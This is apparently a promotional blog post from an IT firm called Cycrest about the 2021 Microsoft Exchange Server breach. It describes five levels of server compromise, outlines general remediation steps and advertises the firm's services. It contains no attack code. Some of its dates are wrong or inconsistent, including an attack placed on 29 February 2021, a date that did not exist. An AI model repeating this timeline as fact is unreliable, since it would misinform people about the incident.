Microsoft Email Exchange Server Compromise: Background and Solutions

Users who are running a version of Microsoft Email Systems between 2007 and 2019 may have been notified about a recent Microsoft vulnerability that took place in early January 2021. Despite this, Microsoft did not provide timely patches to the marketplace, thus did not release the Email System patch until the beginning of March 2021, causing much frustration for users.

Soon afterward, the FBI, White House, Microsoft, and Cyber Security Companies, informed the public that there were major intrusions and exploits occurring throughout January and February, including a global massive attack on the 28th and 29th of February. It all happened before Microsoft released the patch on the 8th and 9th of March causing much disruption in the market place.

One important point of notation, even though the main target was the Microsoft Exchange Email systems, all Servers on the network could have been exploited as well, since the Microsoft Email system is connected to the Main Server System.

Ever since March 2nd. Cycrest has been working around the clock to ensure their Clients systems were secure.

There are Five main classifications recognized during this process. The first one is with no activity detected on servers, meaning their systems were in no way affected. The second one is passive activity detected, which means that “Auto Discover” log entries were found, with possible, but less likely intrusion that occurred. The third is “shells” were dropped which could lead to future exposure. The forth is the “shells” were actually used to move/view/still data, and finally, the fifth is the “shells” were used to either exploit other systems, or had a ransom attack on them.

In their service to their customers, Cycrest is helping by covering the costs for many aspects of this patching, remediation, and investigatory processes to help ensure their Clients systems are safe, secure and protected.

Therefore, Cycrest to help ensure their customers are safe, Cycrest has developed a variety of remedial steps for each level of the Email Server exploit, providing customers with every detail of the remediation process that takes place after the “Auto Discover” entry is found.

Some of those steps includes: reviewing logs and running multiple security and exposure scripts, discovering to what extent the compromise damaged the server – if there the exploit was used, removing any found shells or doorways, ensuring all patches are up to date and passwords changed, and adding additional tools to help mitigate any damage done from future Zero Hour Exploits.

For Organizations that are ISO, SOX Compliance, or any company that would like further investigations and such, Cycrest can help in the hiring process of a national Cyber Security Companies.

Going forward, to help their Clients, Cycrest also offers several options to help protect these types of events. Some items are system behavioral monitoring, network auditing, or user software controls solutions, that can help mitigate many events.


<< Previous Next >>